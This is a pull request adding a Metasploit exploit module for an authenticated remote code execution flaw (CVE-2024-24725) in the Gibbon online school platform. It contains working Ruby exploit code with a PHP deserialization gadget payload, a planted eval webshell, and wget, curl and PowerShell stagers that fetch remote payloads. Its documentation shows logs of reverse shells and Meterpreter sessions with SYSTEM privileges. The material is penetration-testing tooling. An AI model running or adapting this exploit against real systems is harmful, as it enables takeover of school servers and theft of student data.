### PR TITLE
Gibbon Online School Platform Authenticated RCE [CVE-2024-24725]

### DIFF
--- a/documentation/modules/exploit/multi/http/gibbon_auth_rce_cve_2024_24725.md
+++ b/documentation/modules/exploit/multi/http/gibbon_auth_rce_cve_2024_24725.md
@@ -1,0 +1,275 @@
+## Vulnerable Application
+
+A Remote Code Execution vulnerability in Gibbon online school platform version `26.0.00` and lower
+allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a POST request
+to the endpoint `/modules/System%20Admin/import_run.php&type=externalAssessment&step=4`.
+As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,
+potentially resulting in complete system compromise, data exfiltration, or unauthorized access to sensitive information.
+
+This module has been tested with:
+* Gibbon online School Platform `v26.0.00` on Windows Server `2019` Standard running in VirtualBox `7.0.14 r161095 (Qt5.15.2)`.
+* Gibbon online School Platform `v26.0.00` on Ubuntu `22.04` running in VirtualBox `7.0.14 r161095 (Qt5.15.2)`.
+
+## Installation steps to install the Gibbon Online School Platform
+* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
+* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/).
+* Download the Gibbon School Platform software from [here](https://docs.gibbonedu.org/administrators/getting-started/download/).
+* Install Gibbon following [these instructions](https://docs.gibbonedu.org/administrators/getting-started/installing-gibbon/).
+* When installed, you should be able to access the Gibbon Online School Platform
+* either thru `HTTP` port 80 or `HTTPS` port 443 depending on your configuration settings.
+
+You are now ready to test the module.
+
+## Verification Steps
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/multi/http/gibbon_auth_rce_cve_2024_24725`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set username <username>`
+- [ ] `set password <password>`
+- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper, 3=Windows Command, 4=Windows Dropper>`
+- [ ] `exploit`
+
+you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings.
+
+## Options
+
+### WEBSHELL
+You can use this option to set the filename without extension of the webshell.
+This is handy if you want to test the webshell upload and execution with different file names.
+to bypass any security settings on the Web and PHP server.
+### USERNAME
+A valid Gibbon username to authenticate at the Gibbon School Platform.
+You can use the e-mail address or the short name of the user.
+### PASSWORD
+The password of the Gibbon user in clear text format.
+
+## Scenarios
+```msf
+msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > info
+
+       Name: Gibbon School Platform Authenticated PHP Deserialization Vulnerability
+     Module: exploit/multi/http/gibbon_auth_rce_cve_2024_24725
+   Platform: PHP, Unix, Linux, Windows
+       Arch: php, cmd, x64, x86
+ Privileged: No
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2024-03-18
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  SecondX.io Research Team(Ali Maharramli,Fikrat Guliev,Islam Rzayev)
+
+Module side effects:
+ ioc-in-logs
+ artifacts-on-disk
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   PHP
+      1   Unix Command
+      2   Linux Dropper
+      3   Windows Command
+      4   Windows Dropper
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting        Required  Description
+  ----       ---------------        --------  -----------
+  PASSWORD                          yes       Password
+  Proxies                           no        A proxy chain of format type:host:port[,type:host:port][
+                                              ...]
+  RHOSTS                            yes       The target host(s), see https://docs.metasploit.com/docs
+                                              /using-metasploit/basics/using-metasploit.html
+  RPORT      443                    yes       The target port (TCP)
+  SSL        true                   no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
+  TARGETURI  /                      yes       The Gibbon online school platform endpoint URL
+  URIPATH                           no        The URI to use for this exploit (default is random)
+  USERNAME                          yes       Gibbon username to login, typically an e-mail address
+  VHOST                             no        HTTP server virtual host
+  WEBSHELL                          no        Set webshell name without extension. Name will be randomly generated if left unset.
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an
+                                      address on the local machine or 0.0.0.0 to listen on all addresses.
+  SRVPORT  8080             yes       The local port to listen on.
+
+Payload information:
+
+Description:
+  A Remote Code Execution vulnerability in Gibbon online school platform version 26.0.00 and lower
+  allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a
+  POST request to the endpoint `/modules/System%20Admin/import_run.php&type=externalAssessment&step=4`.
+  As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,
+  potentially resulting in complete system compromise, data exfiltration, or unauthorized access
+  to sensitive information.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2024-24725
+  https://attackerkb.com/topics/ogKGAB44BP/cve-2024-24725
+  https://packetstormsecurity.com/files/177635
+  https://www.exploit-db.com/exploits/51903
+
+
+View the full module info with the info -d command.
+```
+### Target 0 - PHP native `php/meterpreter/reverse_tcp` session
+```shell
+msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set rport 80
+rport => 80
+msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set ssl false
+ssl => false
+msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set username cuckoo@clock.com
+username => cuckoo@clock.com
+msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set password dingdong
+password => dingdong
+msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set rhosts 192.168.201.4
+rhosts => 192.168.201.4
+msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set lhost 192.168.201.8
+lhost => 192.168.201.8
+msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.4:80 can be exploited.
+[+] The target appears to be vulnerable. Gibbon v26.0.00
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (39927 bytes) to 192.168.201.4
+[+] Deleted FaYSQoZdlBg.php
+[*] Meterpreter session 5 opened (192.168.201.8:4444 -> 192.168.201.4:49958) at 2024-04-01 15:07:30 +0000
+
+meterpreter > sysinfo
+Computer    : WIN-BJDNH44EEDB
+OS          : Windows NT WIN-BJDNH44EEDB 10.0 build 17763 (Windows Server 2016) AMD64
+Meterpreter : php/windows
+meterpreter > getuid
+Server username: SYSTEM
+meterpreter > pwd
+C:\wamp64\www
+meterpreter >
+```
+### Target 1 - Unix Command `cmd/unix/reverse_bash` session
+```shell
+msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set target 1
+target => 1
+msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.44:80 can be exploited.
+[+] The target appears to be vulnerable. Gibbon v26.0.00
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[*] Command shell session 2 opened (192.168.201.8:4444 -> 192.168.201.44:33118) at 2024-04-01 19:51:43 +0000
+
+pwd
+/var/www
+uname -a
+Linux cuckoo 5.15.0-101-generic #111-Ubuntu SMP Tue Mar 5 20:16:58 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data),29(audio)
+```
+### Target 2 - Linux Dropper `linux/x64/meterpreter/reverse_tcp` session
+```shell
+msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set target 2
+target => 2
+msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.44:80 can be exploited.
+[+] The target appears to be vulnerable. Gibbon v26.0.00
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.8:8080/gn2mFk
+[*] Client 192.168.201.44 (Wget/1.21.2) requested /gn2mFk
+[*] Sending payload to 192.168.201.44 (Wget/1.21.2)
+[*] Sending stage (3045380 bytes) to 192.168.201.44
+[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.44:46276) at 2024-04-01 19:57:04 +0000
+[*] Command Stager progress - 100.00% done (112/112 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.201.44
+OS           : Ubuntu 22.04 (Linux 5.15.0-101-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter > exit
+```
+### Target 3 - Windows Command `cmd/windows/powershell/x64/meterpreter/reverse_tcp` session
+```shell
+msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set target 3
+target => 3
+msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.4:80 can be exploited.
+[+] The target appears to be vulnerable. Gibbon v26.0.00
+[*] Executing Windows Command for cmd/windows/powershell/x64/meterpreter/reverse_tcp
+[*] Sending stage (201798 bytes) to 192.168.201.4
+[*] Meterpreter session 6 opened (192.168.201.8:4444 -> 192.168.201.4:49962) at 2024-04-01 15:11:38 +0000
+
+meterpreter > sysinfo
+Computer        : WIN-BJDNH44EEDB
+OS              : Windows Server 2019 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
+### Target 4 - Windows Dropper `windows/x64/meterpreter/reverse_tcp` session
+```shell
+msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set target 4
+target => 4
+msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.4:80 can be exploited.
+[+] The target appears to be vulnerable. Gibbon v26.0.00
+[*] Executing Windows Dropper for windows/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.8:8080/877P8aB3
+[*] Client 192.168.201.4 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1) requested /877P8aB3
+[*] Sending payload to 192.168.201.4 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1)
+[*] Sending stage (201798 bytes) to 192.168.201.4
+[*] Meterpreter session 7 opened (192.168.201.8:4444 -> 192.168.201.4:49967) at 2024-04-01 15:13:43 +0000
+[*] Command Stager progress - 100.00% done (147/147 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer        : WIN-BJDNH44EEDB
+OS              : Windows Server 2019 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
+
+## Limitations
+No limitations except for the fact that you need valid login credentials.

--- a/modules/exploits/multi/http/gibbon_auth_rce_cve_2024_24725.rb
+++ b/modules/exploits/multi/http/gibbon_auth_rce_cve_2024_24725.rb
@@ -1,0 +1,251 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Gibbon School Platform Authenticated PHP Deserialization Vulnerability',
+        'Description' => %q{
+          A Remote Code Execution vulnerability in Gibbon online school platform version 26.0.00 and lower
+          allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a
+          POST request to the endpoint `/modules/System%20Admin/import_run.php&type=externalAssessment&step=4`.
+          As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,
+          potentially resulting in complete system compromise, data exfiltration, or unauthorized access
+          to sensitive information.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
+          'SecondX.io Research Team(Ali Maharramli,Fikrat Guliev,Islam Rzayev)' # Discovery of the vulnerability
+        ],
+        'References' => [
+          ['CVE', '2024-24725'],
+          ['URL', 'https://attackerkb.com/topics/ogKGAB44BP/cve-2024-24725'],
+          ['PACKETSTORM', '177635'],
+          ['EDB', '51903']
+        ],
+        'DisclosureDate' => '2024-03-18',
+        'Platform' => ['php', 'unix', 'linux', 'win'],
+        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'PHP',
+            {
+              'Platform' => ['php'],
+              'Arch' => ARCH_PHP,
+              'Type' => :php,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Unix Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => ['linux'],
+              'Arch' => [ARCH_X64, ARCH_X86],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'],
+              'Linemax' => 16384,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :windows_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X64, ARCH_X86],
+              'Type' => :windows_dropper,
+              'Linemax' => 16384,
+              'CmdStagerFlavor' => ['psh_invokewebrequest', 'vbs', 'debug_asm', 'debug_write', 'certutil'],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 443
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The Gibbon online school platform endpoint URL', '/' ]),
+      OptString.new('WEBSHELL', [false, 'Set webshell name without extension. Name will be randomly generated if left unset.', nil]),
+      OptString.new('USERNAME', [true, 'Gibbon username to login, typically an e-mail address', nil]),
+      OptString.new('PASSWORD', [true, 'Password', nil])
+    ])
+  end
+
+  def gibbon_login
+    # construct multipart login form data
+    form_data = Rex::MIME::Message.new
+    form_data.add_part('', nil, nil, 'form-data; name="address"')
+    form_data.add_part('default', nil, nil, 'form-data; name="method"')
+    form_data.add_part(datastore['USERNAME'].to_s, nil, nil, 'form-data; name="username"')
+    form_data.add_part(datastore['PASSWORD'].to_s, nil, nil, 'form-data; name="password"')
+    form_data.add_part('025', nil, nil, 'form-data; name="gibbonSchoolYearID"')
+    form_data.add_part('0002', nil, nil, 'form-data; name="gibboni18nID"')
+
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'login.php?timeout=true'),
+      'keep_cookies' => true,
+      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",
+      'data' => form_data.to_s
+    })
+  end
+
+  def construct_form_data(payload)
+    # construct multipart form data with payload
+    payload_len = payload.length
+    payload_data = "a:2:{i:7;O:32:\"Monolog\\Handler\\SyslogUdpHandler\":1:{s:9:\"\x00*\x00socket\";O:29:\"Monolog\\Handler\\BufferHandler\":7:{s:10:\"\x00*\x00handler\";r:3;s:13:\"\x00*\x00bufferSize\";i:-1;s:9:\"\x00*\x00buffer\";a:1:{i:0;a:2:{i:0;s:#{payload_len}:\"#{payload}\";s:5:\"level\";N;}}s:8:\"\x00*\x00level\";N;s:14:\"\x00*\x00initialized\";b:1;s:14:\"\x00*\x00bufferLimit\";i:-1;s:13:\"\x00*\x00processors\";a:2:{i:0;s:7:\"current\";i:1;s:6:\"system\";}}}i:7;i:7;}"
+
+    form_data = Rex::MIME::Message.new
+    form_data.add_part('/modules/System Admin/import_run.php', nil, nil, 'form-data; name="address"')
+    form_data.add_part('sync', nil, nil, 'form-data; name="mode"')
+    form_data.add_part('N', nil, nil, 'form-data; name="syncField"')
+    form_data.add_part('', nil, nil, 'form-data; name="syncColumn"')
+    form_data.add_part(payload_data.to_s, nil, nil, 'form-data; name="columnOrder"')
+    form_data.add_part('N;', nil, nil, 'form-data; name="columnText"')
+    form_data.add_part('%2C', nil, nil, 'form-data; name="fieldDelimiter"')
+    form_data.add_part('%22', nil, nil, 'form-data; name="stringEnclosure"')
+    form_data.add_part('DataStructure-externalAssessment.xlsx', nil, nil, 'form-data; name="filename"')
+    form_data.add_part('"External Assessment","Assessment Data","Student","Field Name","Category","Field Name","Result"', nil, nil, 'form-data; name="csvData"')
+    form_data.add_part('1', nil, nil, 'form-data; name="ignoreErrors"')
+    form_data.add_part('Submit', nil, nil, 'form-data; name="Failed"')
+    return form_data
+  end
+
+  def upload_webshell
+    # randomize file name if option WEBSHELL is not set
+    @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : "#{datastore['WEBSHELL']}.php")
+    # Create webshell with PHP payload
+    @post_param = Rex::Text.rand_text_alphanumeric(1..8)
+    @get_param = Rex::Text.rand_text_alphanumeric(1..8)
+    php_payload = "echo \"<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>\" > #{@webshell_name}"
+    form_data = construct_form_data(php_payload)
+
+    # upload webshell
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'),
+      'keep_cookies' => true,
+      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",
+      'data' => form_data.to_s
+    })
+  end
+
+  def execute_php(cmd, _opts = {})
+    # execute webshell
+    payload = Base64.strict_encode64(cmd)
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, @webshell_name),
+      'keep_cookies' => true,
+      'vars_post' => {
+        @post_param => payload
+      }
+    })
+  end
+
+  def execute_command(cmd, _opts = {})
+    form_data = construct_form_data(cmd)
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'),
+      'keep_cookies' => true,
+      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",
+      'data' => form_data.to_s
+    })
+  end
+
+  def check
+    print_status("Checking if #{peer} can be exploited.")
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'ctype' => 'application/x-www-form-urlencoded',
+      'uri' => normalize_uri(target_uri.path)
+    })
+    return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200
+
+    # Check if target is running the Gibbon online school platform
+    # Search for the Gibbon version on the login page
+    return CheckCode::Safe('No Gibbon school platform found.') unless res.body.include?('Gibbon')
+
+    # trying to get the version
+    version = res.body.match(/Gibbon.*v\d\d\.\d\.\d\d/)
+    version_number = version[0].split('v') unless version.nil?
+    if version_number
+      if Rex::Version.new(version_number[1]) <= Rex::Version.new('26.0.00')
+        return CheckCode::Appears("Gibbon v#{version_number[1]}")
+      else
+        return CheckCode::Safe("Gibbon v#{version_number[1]}")
+      end
+    end
+    CheckCode::Detected
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    res = gibbon_login
+    fail_with(Failure::NoAccess, "Login failed with user #{datastore['USERNAME']} and password #{datastore['PASSWORD']}.") unless res && res.code == 302
+
+    case target['Type']
+    when :php
+      res = upload_webshell
+      fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200
+      register_file_for_cleanup(@webshell_name)
+      execute_php(payload.encoded)
+    when :unix_cmd, :windows_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper, :windows_dropper
+      # Don't check the response here since the server won't respond
+      # if the payload is successfully executed.
+      execute_cmdstager({ linemax: target.opts['Linemax'] })
+    end
+  end
+end

--- a/modules/exploits/multi/http/gibbon_auth_rce_cve_2024_24725.rb
+++ b/modules/exploits/multi/http/gibbon_auth_rce_cve_2024_24725.rb
@@ -27,7 +27,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => [
           'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
-          'SecondX.io Research Team(Ali Maharramli,Fikrat Guliev,Islam Rzayev)' # Discovery of the vulnerability
+          'Ali Maharramli', # SecondX.io Research Team - discovery of the vulnerability
+          'Fikrat Guliev', # SecondX.io Research Team - discovery of the vulnerability
+          'Islam Rzayev' # SecondX.io Research Team - discovery of the vulnerability
         ],
         'References' => [
           ['CVE', '2024-24725'],
@@ -115,8 +117,8 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([
       OptString.new('TARGETURI', [ true, 'The Gibbon online school platform endpoint URL', '/' ]),
       OptString.new('WEBSHELL', [false, 'Set webshell name without extension. Name will be randomly generated if left unset.', nil]),
-      OptString.new('USERNAME', [true, 'Gibbon username to login, typically an e-mail address', nil]),
-      OptString.new('PASSWORD', [true, 'Password', nil])
+      OptString.new('USERNAME', [true, 'Gibbon username to login, typically an e-mail address']),
+      OptString.new('PASSWORD', [true, 'Password'])
     ])
   end
 
@@ -153,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
     form_data.add_part('N;', nil, nil, 'form-data; name="columnText"')
     form_data.add_part('%2C', nil, nil, 'form-data; name="fieldDelimiter"')
     form_data.add_part('%22', nil, nil, 'form-data; name="stringEnclosure"')
-    form_data.add_part('DataStructure-externalAssessment.xlsx', nil, nil, 'form-data; name="filename"')
+    form_data.add_part("#{Rex::Text.rand_text_alpha(8..16)}.xlsx", nil, nil, 'form-data; name="filename"')
     form_data.add_part('"External Assessment","Assessment Data","Student","Field Name","Category","Field Name","Result"', nil, nil, 'form-data; name="csvData"')
     form_data.add_part('1', nil, nil, 'form-data; name="ignoreErrors"')
     form_data.add_part('Submit', nil, nil, 'form-data; name="Failed"')
@@ -164,7 +166,8 @@ class MetasploitModule < Msf::Exploit::Remote
     # randomize file name if option WEBSHELL is not set
     @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : "#{datastore['WEBSHELL']}.php")
 
-    # Create webshell with base64 encoded PHP payload
+    # create webshell with base64 encoded PHP payload
+    # works for both windows and linux targets
     php_payload = "echo \"<?php @eval(base64_decode(\'#{b64_payload}\'));?>\" > #{@webshell_name}"
     form_data = construct_form_data(php_payload)
 
@@ -212,12 +215,12 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200
 
-    # Check if target is running the Gibbon online school platform
-    # Search for the Gibbon version on the login page
+    # check if target is running the Gibbon online school platform
+    # search for the Gibbon version on the login page
     return CheckCode::Safe('No Gibbon school platform found.') unless res.body.include?('Gibbon')
 
     # trying to get the version
-    version = res.body.match(/Gibbon.*v\d\d\.\d\.\d\d/)
+    version = res.body.match(/Gibbon.*v(\d+\.\d+\.\d+)/)
     version_number = version[0].split('v') unless version.nil?
     if version_number
       if Rex::Version.new(version_number[1]) <= Rex::Version.new('26.0.00')
@@ -240,7 +243,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when :unix_cmd, :windows_cmd
       execute_command(payload.encoded)
     when :linux_dropper, :windows_dropper
-      # Don't check the response here since the server won't respond
+      # don't check the response here since the server won't respond
       # if the payload is successfully executed.
       execute_cmdstager({ linemax: target.opts['Linemax'] })
     end

--- a/modules/exploits/multi/http/gibbon_auth_rce_cve_2024_24725.rb
+++ b/modules/exploits/multi/http/gibbon_auth_rce_cve_2024_24725.rb
@@ -160,13 +160,12 @@ class MetasploitModule < Msf::Exploit::Remote
     return form_data
   end
 
-  def upload_webshell
+  def upload_webshell(b64_payload)
     # randomize file name if option WEBSHELL is not set
     @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : "#{datastore['WEBSHELL']}.php")
-    # Create webshell with PHP payload
-    @post_param = Rex::Text.rand_text_alphanumeric(1..8)
-    @get_param = Rex::Text.rand_text_alphanumeric(1..8)
-    php_payload = "echo \"<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>\" > #{@webshell_name}"
+
+    # Create webshell with base64 encoded PHP payload
+    php_payload = "echo \"<?php @eval(base64_decode(\'#{b64_payload}\'));?>\" > #{@webshell_name}"
     form_data = construct_form_data(php_payload)
 
     # upload webshell
@@ -180,15 +179,16 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_php(cmd, _opts = {})
-    # execute webshell
     payload = Base64.strict_encode64(cmd)
+    res = upload_webshell(payload)
+    fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200
+    register_file_for_cleanup(@webshell_name)
+
+    # execute webshell
     send_request_cgi({
-      'method' => 'POST',
+      'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, @webshell_name),
-      'keep_cookies' => true,
-      'vars_post' => {
-        @post_param => payload
-      }
+      'keep_cookies' => true
     })
   end
 
@@ -236,9 +236,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     case target['Type']
     when :php
-      res = upload_webshell
-      fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200
-      register_file_for_cleanup(@webshell_name)
       execute_php(payload.encoded)
     when :unix_cmd, :windows_cmd
       execute_command(payload.encoded)


### PR DESCRIPTION
A Remote Code Execution vulnerability in Gibbon online school platform version `26.0.00` and lower allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a POST request to the endpoint `/modules/System%20Admin/import_run.php&type=externalAssessment&step=4`.
As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands, potentially resulting in complete system compromise, data exfiltration, or unauthorized access to sensitive information.

This module has been tested with:
* Gibbon online School Platform `v26.0.00` on Windows Server `2019` Standard running in VirtualBox `7.0.14 r161095 (Qt5.15.2)`.
* Gibbon online School Platform `v26.0.00` on Ubuntu `22.04` running in VirtualBox `7.0.14 r161095 (Qt5.15.2)`.

## Installation steps to install the Gibbon Online School Platform
* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform. 
* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/).
* Download the Gibbon School Platform software from [here](https://docs.gibbonedu.org/administrators/getting-started/download/).
* Install Gibbon on your Linux or Windows Virtual Machine following the [Gibbon installation instructions](https://docs.gibbonedu.org/administrators/getting-started/installing-gibbon/). 
* When installed, you should be able to access the Gibbon Online School Platform either thru `HTTP` port 80 or `HTTPS` port 443 depending on your configuration settings.

You are now ready to test the module.

## Verification Steps

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/gibbon_auth_rce_cve_2024_24725`
- [ ] `set rhosts <ip-target>`
- [ ] `set rport <port>`
- [ ] `set username <username>`
- [ ] `set password <password>`
- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper, 3=Windows Command, 4=Windows Dropper>`
- [ ] `exploit`

you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings.

```shell
msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > info

       Name: Gibbon School Platform Authenticated PHP Deserialization Vulnerability
     Module: exploit/multi/http/gibbon_auth_rce_cve_2024_24725
   Platform: PHP, Unix, Linux, Windows
       Arch: php, cmd, x64, x86
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2024-03-18

Provided by:
  h00die-gr3y <h00die.gr3y@gmail.com>
  SecondX.io Research Team(Ali Maharramli,Fikrat Guliev,Islam Rzayev)

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   PHP
      1   Unix Command
      2   Linux Dropper
      3   Windows Command
      4   Windows Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting        Required  Description
  ----       ---------------        --------  -----------
  PASSWORD                          yes       Password
  Proxies                           no        A proxy chain of format type:host:port[,type:host:port][
                                              ...]
  RHOSTS                            yes       The target host(s), see https://docs.metasploit.com/docs
                                              /using-metasploit/basics/using-metasploit.html
  RPORT      443                    yes       The target port (TCP)
  SSL        true                   no        Negotiate SSL/TLS for outgoing connections
  SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                      yes       The Gibbon online school platform endpoint URL
  URIPATH                           no        The URI to use for this exploit (default is random)
  USERNAME                          yes       Gibbon username to login, typically an e-mail address
  VHOST                             no        HTTP server virtual host
  WEBSHELL                          no        Set webshell name without extension. Name will be randomly generated if left unset.


